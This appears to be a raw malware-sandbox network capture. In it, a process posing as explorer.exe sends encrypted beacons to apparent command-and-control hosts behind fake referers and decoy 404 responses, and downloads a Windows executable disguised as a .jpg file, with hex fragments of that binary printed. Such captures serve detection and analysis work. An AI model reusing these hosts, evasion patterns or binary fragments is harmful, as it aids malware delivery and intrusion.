                                                                                                                                                                    Feb 8, 2024 19:09:32.933618069 CET238INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:09:32 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=utf-8


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    11192.168.2.349750109.175.29.3980640C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:09:33.183780909 CET281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://jrkmnnxfovbuuh.org/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 295
                                                                                                                                                                    Host: sjyey.com
                                                                                                                                                                    Feb 8, 2024 19:09:33.183968067 CET295OUTData Raw: 3b 6e 24 10 82 cc 1d 25 db dc c0 0a 74 07 0b b7 0c 78 cc 91 1a 03 97 6a 79 78 72 e5 32 b0 c2 6a 9f 56 cf 21 06 6a 50 1c ef 98 3f cb 2e 25 d5 f9 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 5b 4c b8 9c
                                                                                                                                                                    Data Ascii: ;n$%txjyxr2jV!jP?.%Yt M@NA -[k,vu[L,Ac*9dC{ ).|f&:_<)AYNORrmj!K{}8\;*-a-5)X4\,
                                                                                                                                                                    Feb 8, 2024 19:09:33.607817888 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:09:33 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 340
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    12192.168.2.349753109.175.29.3980640C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:09:33.958622932 CET282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://kpyxmeqosvwxhjg.org/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 182
                                                                                                                                                                    Host: sjyey.com
                                                                                                                                                                    Feb 8, 2024 19:09:33.958657980 CET182OUTData Raw: 3b 6e 24 10 82 cc 1d 25 db dc c0 0a 74 07 0b b7 0c 78 cc 91 1a 03 97 6a 79 78 72 e5 32 b0 c2 6a 9f 56 cf 21 06 6a 50 1c ef 98 3f cb 2e 25 d5 f9 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 28 50 e4 a8
                                                                                                                                                                    Data Ascii: ;n$%txjyxr2jV!jP?.%Yt M@NA -[k,vu(PWnpnUDVHl>(!T]:*=<8;zv.u/[BL
                                                                                                                                                                    Feb 8, 2024 19:09:34.379224062 CET293INHTTP/1.0 404 Not Found
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:09:34 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 47
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 67 52 e4 34 05 f5 f4 4e fd 9b ac a9 2d 99 61 c5 f0 2c 4e 1a c3 db c1 c4 74 d3
                                                                                                                                                                    Data Ascii: #\6gR4N-a,Nt


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    13192.168.2.349755109.175.29.3980640C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:09:38.700090885 CET278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://pdoiavwbsnf.net/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 117
                                                                                                                                                                    Host: sjyey.com
                                                                                                                                                                    Feb 8, 2024 19:09:38.700145006 CET117OUTData Raw: 3b 6e 24 10 82 cc 1d 25 db dc c0 0a 74 07 0b b7 0c 78 cc 91 1a 03 97 6a 79 78 72 e5 32 b0 c2 6a 9f 56 cf 21 06 6a 50 1c ef 98 3f cb 2e 25 d5 f9 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 0f 6b 2c 90 f4 76 0b 75 38 41 de f0
                                                                                                                                                                    Data Ascii: ;n$%txjyxr2jV!jP?.%Yt M@NA ,[k,vu8Au/okc/TcGq
                                                                                                                                                                    Feb 8, 2024 19:09:39.125148058 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:09:38 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 340
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    14192.168.2.349756109.175.29.3980640C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:09:39.378887892 CET281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://ovpruxbekqkgey.org/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 246
                                                                                                                                                                    Host: sjyey.com
                                                                                                                                                                    Feb 8, 2024 19:09:39.378964901 CET246OUTData Raw: 3b 6e 24 10 82 cc 1d 25 db dc c0 0a 74 07 0b b7 0c 78 cc 91 1a 03 97 6a 79 78 72 e5 32 b0 c2 6a 9f 56 cf 21 06 6a 50 1c ef 98 3f cb 2e 25 d5 f9 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 26 01 db 84
                                                                                                                                                                    Data Ascii: ;n$%txjyxr2jV!jP?.%Yt M@NA -[k,vu&EUo;dUW^!/`vd%Pp5Mg]X!<d`[.,!dc.X"tV|cbhO5S-dY~
                                                                                                                                                                    Feb 8, 2024 19:09:39.814235926 CET285INHTTP/1.0 404 Not Found
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:09:39 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 39
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 7c 06 6d 50 fb 3c 44 f8 f7 4a bc 9b ef ae 6d c5 60 df e8 24
                                                                                                                                                                    Data Ascii: #\|mP<DJm`$


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    15192.168.2.349758211.168.53.11080640C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:09:45.249669075 CET157OUTGET /emd/1.jpg HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Host: emgvod.com
                                                                                                                                                                    Feb 8, 2024 19:09:46.057313919 CET239INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.24.0
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:09:45 GMT
                                                                                                                                                                    Content-Type: image/jpeg
                                                                                                                                                                    Content-Length: 357888
                                                                                                                                                                    Last-Modified: Thu, 08 Feb 2024 16:50:02 GMT
                                                                                                                                                                    Connection: close
                                                                                                                                                                    ETag: "65c5063a-57600"
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Feb 8, 2024 19:09:46.057399988 CET1286INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73
                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$FsG~BwpRichPEL
                                                                                                                                                                    Feb 8, 2024 19:09:46.357090950 CET1286INData Raw: ff 25 8c 11 45 00 3b 0d 04 50 45 00 75 02 f3 c3 e9 9b 03 00 00 8b ff 55 8b ec 83 7d 08 00 74 2d ff 75 08 6a 00 ff 35 d4 70 45 00 ff 15 a4 10 45 00 85 c0 75 18 56 e8 bd 04 00 00 8b f0 ff 15 a0 10 45 00 50 e8 6d 04 00 00 59 89 06 5e 5d c3 8b ff 55
                                                                                                                                                                    Data Ascii: %E;PEuU}t-uj5pEEuVEPmY^]UQeVEPuuu9Et|tsM^UQSV5EW5l5h];+GruS$GY;sH;s;rPu`
                                                                                                                                                                    Feb 8, 2024 19:09:46.357124090 CET1286INData Raw: c3 83 c0 08 c3 e8 46 15 00 00 85 c0 75 06 b8 7c 51 45 00 c3 83 c0 0c c3 8b ff 55 8b ec 56 e8 e2 ff ff ff 8b 4d 08 51 89 08 e8 82 ff ff ff 59 8b f0 e8 bc ff ff ff 89 30 5e 5d c3 8b ff 55 8b ec e8 0b 15 00 00 85 c0 75 05 6a 0c 58 5d c3 e8 9f ff ff
                                                                                                                                                                    Data Ascii: Fu|QEUVMQY0^]UujX]M3]UVuujXz3^]UujX]lM3]UVuujXG3^]jhjDE3pE5pEE%
                                                                                                                                                                    Feb 8, 2024 19:09:46.357141972 CET1286INData Raw: 00 a3 08 71 45 00 8a 45 10 a2 04 71 45 00 83 7d 0c 00 0f 85 a0 00 00 00 ff 35 6c d5 bf 02 8b 35 ac 10 45 00 ff d6 8b d8 89 5d d0 85 db 74 68 ff 35 68 d5 bf 02 ff d6 8b f8 89 7d d4 89 5d dc 89 7d d8 83 ef 04 89 7d d4 3b fb 72 4b e8 85 0e 00 00 39
                                                                                                                                                                    Data Ascii: qEEqE}5l5E]th5h}]}};rK9t;r>7r5l5h9]u9Et]]E}]EE}EsEtEEE}EsEtEE }u)qE
                                                                                                                                                                    Feb 8, 2024 19:09:46.652976990 CET1286INData Raw: 50 50 50 e8 02 11 00 00 56 e8 43 24 00 00 40 59 83 f8 3c 76 2a 56 e8 36 24 00 00 8d 04 45 cc 70 45 00 8b c8 2b ce 6a 03 d1 f9 68 8c 1b 45 00 2b d9 53 50 e8 4c 23 00 00 83 c4 14 85 c0 75 bd 68 84 1b 45 00 be 14 03 00 00 56 57 e8 bf 22 00 00 83 c4
                                                                                                                                                                    Data Ascii: PPPVC$@Y<v*V6$EpE+jhE+SPL#uhEVW"uVW"uh h8EW(!^SSSSSyjE;tFtA3Gf9Gt@=rSPP]J YPPVEM_^3[j#
                                                                                                                                                                    Feb 8, 2024 19:09:46.652993917 CET1286INData Raw: 74 12 49 85 d2 74 04 c6 02 5c 42 ff 07 85 c9 75 f1 89 55 0c 8a 06 84 c0 74 55 83 7d fc 00 75 08 3c 20 74 4b 3c 09 74 47 85 db 74 3d 0f be c0 50 85 d2 74 23 e8 82 22 00 00 59 85 c0 74 0d 8a 06 8b 4d 0c ff 45 0c 88 01 46 ff 07 8b 4d 0c 8a 06 ff 45
                                                                                                                                                                    Data Ascii: tIt\BuUtU}u< tK<tGt=Pt#"YtMEFME_"YtFUFVtBUME^[t US3VW9pu)h8wEVS<xEEx5pE;tE8uuUEPSS}E
                                                                                                                                                                    Feb 8, 2024 19:09:46.653007030 CET1286INData Raw: 15 18 11 45 00 8b f0 85 f6 75 1b ff 35 44 78 45 00 ff 15 ac 10 45 00 8b f0 56 ff 35 c4 51 45 00 ff 15 1c 11 45 00 8b c6 5e c3 8b ff 55 8b ec ff 75 0c ff 75 08 ff 35 48 78 45 00 ff 15 ac 10 45 00 ff d0 5d c2 08 00 a1 c0 51 45 00 83 f8 ff 74 16 50
                                                                                                                                                                    Data Ascii: Eu5DxEEV5QEE^Uuu5HxEE]QEtP5LxEEQEQEtP EQEjh5EhEEuF\Ef3G~~pCKCFhSEjYevh$EE>jY}
                                                                                                                                                                    Feb 8, 2024 19:09:46.653021097 CET1286INData Raw: bf 4e e6 40 bb bb 00 00 ff ff 3b c7 74 0d 85 c3 74 09 f7 d0 a3 08 50 45 00 eb 65 56 8d 45 f8 50 ff 15 38 11 45 00 8b 75 fc 33 75 f8 ff 15 34 11 45 00 33 f0 ff 15 28 11 45 00 33 f0 ff 15 24 10 45 00 33 f0 8d 45 f0 50 ff 15 30 11 45 00 8b 45 f4 33
                                                                                                                                                                    Data Ascii: N@;ttPEeVEP8Eu3u4E3(E3$E3EP0EE3E3;uO@uG5PE5PE^_[%XUEPxE]U(PE3ES]WtSYjLjPN#0
                                                                                                                                                                    Feb 8, 2024 19:09:46.653034925 CET1286INData Raw: 73 10 2b f3 56 6a 00 03 df 53 e8 11 1f 00 00 83 c4 0c 8b c7 5f 5e 5b 5d c3 8b ff 56 57 33 f6 bf 60 78 45 00 83 3c f5 cc 51 45 00 01 75 1d 8d 04 f5 c8 51 45 00 89 38 68 a0 0f 00 00 ff 30 83 c7 18 ff 15 08 11 45 00 85 c0 74 0c 46 83 fe 24 7c d3 33
                                                                                                                                                                    Data Ascii: s+VjS_^[]VW3`xE<QEuQE8h0EtF$|3@_^$QE3SEVQEW>t~tWWc&YRE|QE_t~uPRE|^[UE4QE@E]t$jDEh@Yjh@6E{
                                                                                                                                                                    Feb 8, 2024 19:09:46.653048992 CET1286INData Raw: a3 bc 79 45 00 eb 61 ff 35 b8 79 45 00 ff 15 ac 10 45 00 89 45 e4 3b f7 74 4e 56 ff 15 a8 10 45 00 a3 b8 79 45 00 eb 40 ff 35 c0 79 45 00 ff 15 ac 10 45 00 89 45 e4 3b f7 74 2d 56 ff 15 a8 10 45 00 a3 c0 79 45 00 eb 1f ff 35 b4 79 45 00 ff 15 ac
                                                                                                                                                                    Data Ascii: yEa5yEEE;tNVEyE@5yEEE;t-VEyE5yEEE;tVEyEE}uE8]j+Yt$tt~~j h6E3}}]KtjY+t"+t+tY+uC1


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    16192.168.2.349759109.175.29.3980640C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:09:48.436491966 CET280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://jnfuqtjhjeeel.org/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 188
                                                                                                                                                                    Host: sjyey.com
                                                                                                                                                                    Feb 8, 2024 19:09:48.436522007 CET188OUTData Raw: 3b 6e 24 10 82 cc 1d 25 db dc c0 0a 74 07 0b b7 0c 78 cc 91 1a 03 97 6a 79 78 72 e5 32 b0 c2 6a 9f 56 cf 21 06 6a 50 1c ef 98 3f cb 2e 25 d5 f9 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 0c 6b 2c 90 f4 76 0b 75 45 2a a7 ea
                                                                                                                                                                    Data Ascii: ;n$%txjyxr2jV!jP?.%Yt M@NA ,[k,vuE*z{@q3y;FnzUIPc?G',Ej =]M%Z?kFk(X&3o
                                                                                                                                                                    Feb 8, 2024 19:09:48.865200996 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:09:48 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 340
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    17192.168.2.349760109.175.29.3980640C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:09:49.138297081 CET280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://qfwrnirlflnll.net/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 114
                                                                                                                                                                    Host: sjyey.com
                                                                                                                                                                    Feb 8, 2024 19:09:49.138320923 CET114OUTData Raw: 3b 6e 24 10 82 cc 1d 25 db dc c0 0a 74 07 0b b7 0c 78 cc 91 1a 03 97 6a 79 78 72 e5 32 b0 c2 6a 9f 56 cf 21 06 6a 50 1c ef 98 3f cb 2e 25 d5 f9 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 63 3a c6 97
                                                                                                                                                                    Data Ascii: ;n$%txjyxr2jV!jP?.%Yt M@NA -[k,vuc:tW]{"JYJrcZ
                                                                                                                                                                    Feb 8, 2024 19:09:49.569333076 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:09:49 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 340
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    18192.168.2.349761109.175.29.3980640C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:09:50.261143923 CET282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://wcswlidqguumqri.net/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 207
                                                                                                                                                                    Host: sjyey.com
                                                                                                                                                                    Feb 8, 2024 19:09:50.261909962 CET207OUTData Raw: 3b 6e 24 10 82 cc 1d 25 db dc c0 0a 74 07 0b b7 0c 78 cc 91 1a 03 97 6a 79 78 72 e5 32 b0 c2 6a 9f 56 cf 21 06 6a 50 1c ef 98 3f cb 2e 25 d5 f9 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 37 02 f3 97
                                                                                                                                                                    Data Ascii: ;n$%txjyxr2jV!jP?.%Yt M@NA -[k,vu7$E]`Dd58tuU[Rk{HF7KCi^L~Ws]M]{Qi%]
                                                                                                                                                                    Feb 8, 2024 19:09:50.685684919 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:09:50 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 340
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
